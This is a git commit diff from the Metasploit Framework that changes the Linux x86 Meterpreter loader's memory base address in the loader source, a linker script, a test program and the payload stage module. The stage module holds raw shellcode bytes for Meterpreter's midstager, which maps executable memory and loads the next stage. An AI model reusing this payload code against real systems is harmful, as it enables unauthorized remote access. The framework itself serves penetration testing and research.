Change base from 0x90040000 to 0x20040000.

This is more portable across kernel versions / patches it seems. This will be better for SEGMEXEC compatibility as well. git-svn-id: file:///home/svn/framework3/trunk@10455 4d416f70-5f16-0410-b530-b9f4589650da
2010-09-24 04:06:28 +00:00 · 2010-09-24 04:06:28 +00:00 · 740e2c1ab2
parent b8b21cd53c
commit 740e2c1ab2
5 changed files with 5 additions and 5 deletions
--- a/data/msflinker_linux_x86.bin
+++ b/data/msflinker_linux_x86.bin
--- a/external/source/meterpreter/source/server/rtld/elf2bin.c
+++ b/external/source/meterpreter/source/server/rtld/elf2bin.c
@ -13,7 +13,7 @@

 #define EIGHTMEM (32 * 1024 * 1024)

-#define BASE 0x90040000
+#define BASE 0x20040000

 int main(int argc, char **argv)
 {
--- a/external/source/meterpreter/source/server/rtld/rtldtest.c
+++ b/external/source/meterpreter/source/server/rtld/rtldtest.c
@ -31,8 +31,8 @@ int main(int argc, char **argv)
 	}

 	// mapping = mmap(0x90040000, statbuf.st_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
-	mapping = mmap(0x90040000, statbuf.st_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_PRIVATE, fd, 0);
-	if(mapping == MAP_FAILED || mapping != 0x90040000) {
+	mapping = mmap(0x20040000, statbuf.st_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_PRIVATE, fd, 0);
+	if(mapping == MAP_FAILED || mapping != 0x20040000) {
 		printf("Failed to mmap(): %s (%08x) \n", strerror(errno), mapping);
 		exit(EXIT_FAILURE);
 	}
--- a/external/source/meterpreter/source/server/rtld/script
+++ b/external/source/meterpreter/source/server/rtld/script
@ -7,7 +7,7 @@ SEARCH_DIR("/usr/i486-linux-gnu/lib32"); SEARCH_DIR("/usr/local/lib32"); SEARCH_
 SECTIONS
 {
  /* Read-only sections, merged into text segment: */
-  PROVIDE (__executable_start = SEGMENT_START("text-segment", 0x90040000)); . = SEGMENT_START("text-segment", 0x90040000) + SIZEOF_HEADERS;
+  PROVIDE (__executable_start = SEGMENT_START("text-segment", 0x20040000)); . = SEGMENT_START("text-segment", 0x20040000) + SIZEOF_HEADERS;
  .interp         : { *(.interp) }
  .note.gnu.build-id : { *(.note.gnu.build-id) }
  .hash           : { *(.hash) }
--- a/modules/payloads/stages/linux/x86/meterpreter.rb
+++ b/modules/payloads/stages/linux/x86/meterpreter.rb
@ -83,7 +83,7 @@ module Metasploit3

 		midstager <<
 			"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
-			"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x90\x8b\x4c\x24" +
+			"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
 			"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
 			"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
 			"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +